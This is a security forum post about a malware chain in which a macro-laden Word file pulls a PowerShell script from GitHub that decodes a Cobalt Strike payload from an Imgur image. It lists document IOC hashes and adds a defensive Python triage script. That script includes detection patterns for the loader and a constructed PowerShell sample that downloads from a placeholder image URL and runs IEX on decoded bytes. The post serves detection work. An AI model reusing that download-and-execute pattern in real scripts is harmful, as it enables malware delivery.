GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic

silversurfer

Super Moderator
Thread author
Aug 17, 2014
A new strand of malware uses Word files with macros to download a PowerShell script from GitHub.
This PowerShell script further downloads a legitimate image file from image hosting service Imgur to decode a Cobalt Strike script on Windows systems.

This week researcher Arkbird has shared details on a new macro-based malware that is evasive and spawns payload in multifaceted steps.
The malware strand which looks "like MuddyWater," according to the researcher, ships as an embedded macro within a legacy Microsoft Word (*.doc) file, in the style of the APT group. [...]
Security researcher Florian Roth from Nextron Systems has additionally added the Indicators of Compromise (IOCs) associated with this malware to the MuddyWater IOCs list, and provided YARA rules that can be used to detect the variant in your environment.
The IOCs associated with the macro-laden Word documents used in this campaign are given below:
  1. d1c7a7511bd09b53c651f8ccc43e9c36ba80265ba11164f88d6863f0832d8f81
  2. ed93ce9f84dbea3c070b8e03b82b95eb0944c44c6444d967820a890e8218b866
 
This PowerShell script is also completely dismantled by PowerShell Constrained Language Mode. The Add-Type and New-Object are restricted, so System.Drawing.Bitmap, Net.WebClient, and System.Text.Encoding will fail. :)(y)
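As an added triage example (not code from the post, from Arkbird, or from Nextron Systems), the script below does two defender-side checks that follow from the chain described above: it matches a file's SHA-256 against the two document IOCs listed in the post, and it scores a PowerShell script for the combination the loader relies on (download from an image host, `System.Drawing.Bitmap` pixel reads, `Add-Type`/`New-Object`, `System.Text.Encoding`, and `Invoke-Expression`). The indicator list, weights, threshold, the `i.imgur.com/PLACEHOLDER.png` URL and both sample scripts are constructed for this example and are not from the campaign; the suspicious sample deliberately omits any working decode loop.

```python
"""Triage helper for the image-hosted loader pattern described in the post.

Two checks: (1) does a file's SHA-256 match one of the document IOCs from
the post, and (2) does a PowerShell script combine the building blocks of
the Imgur-image-to-payload loader. Each block alone is common in benign
scripts; the score only crosses the threshold when they appear together.
"""
import hashlib
import re

# SHA-256 hashes of the macro-laden Word documents, copied from the post.
DOCUMENT_IOCS = {
    "d1c7a7511bd09b53c651f8ccc43e9c36ba80265ba11164f88d6863f0832d8f81",
    "ed93ce9f84dbea3c070b8e03b82b95eb0944c44c6444d967820a890e8218b866",
}

# (name, pattern, weight). Weights and patterns are constructed for this
# example; tune them against your own script corpus before relying on them.
INDICATORS = [
    ("image_host_download", re.compile(r"https?://(i\.)?imgur\.com/", re.I), 2),
    ("webclient", re.compile(r"Net\.WebClient", re.I), 1),
    ("bitmap_pixel_read", re.compile(r"System\.Drawing\.Bitmap|\.GetPixel\(", re.I), 2),
    ("add_type", re.compile(r"\bAdd-Type\b", re.I), 1),
    ("invoke_expression", re.compile(r"\bInvoke-Expression\b|\bIEX\b", re.I), 2),
    ("encoding_conversion", re.compile(r"System\.Text\.Encoding", re.I), 1),
]
SUSPICIOUS_THRESHOLD = 6  # constructed cutoff: needs several blocks together


def hash_file_bytes(data: bytes) -> str:
    """Return the lowercase hex SHA-256 of a file's contents."""
    return hashlib.sha256(data).hexdigest()


def matches_ioc(digest_hex: str) -> bool:
    """True if the digest is one of the document hashes from the post."""
    return digest_hex.lower() in DOCUMENT_IOCS


def score_script(text: str):
    """Return (score, [indicator names]) for a PowerShell script body."""
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def is_suspicious(text: str) -> bool:
    """True when enough loader building blocks co-occur in one script."""
    return score_script(text)[0] >= SUSPICIOUS_THRESHOLD


# Constructed sample: the loader shape from the post, with the pixel-decoding
# loop left out on purpose. This is not the real script.
SUSPICIOUS_SAMPLE = r"""
Add-Type -AssemblyName System.Drawing
$wc = New-Object Net.WebClient
$wc.DownloadFile('https://i.imgur.com/PLACEHOLDER.png', "$env:TEMP\img.png")
$img = New-Object System.Drawing.Bitmap("$env:TEMP\img.png")
$px = $img.GetPixel(0, 0)
# ... pixel loop deliberately omitted in this constructed sample ...
IEX ([System.Text.Encoding]::ASCII.GetString($bytes))
"""

# Constructed sample: an ordinary admin script that also loads System.Drawing.
BENIGN_SAMPLE = r"""
Add-Type -AssemblyName System.Drawing
$img = New-Object System.Drawing.Bitmap('C:\Pictures\team.png')
$thumb = $img.GetThumbnailImage(128, 128, $null, [IntPtr]::Zero)
$thumb.Save('C:\Pictures\team_thumb.png')
"""

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        score, hits = score_script(sample)
        print(f"{label}: score={score} flagged={is_suspicious(sample)} hits={hits}")
    # Hash check against the post's IOCs (empty input shown; pass real file bytes).
    print("empty-file hash matches IOC:", matches_ioc(hash_file_bytes(b"")))
```

The hash check is exact-match only, so it catches the two documents named in the post and nothing else; the script scorer is what generalises to re-compiled variants of the same loader, and it complements rather than replaces the YARA rules mentioned above.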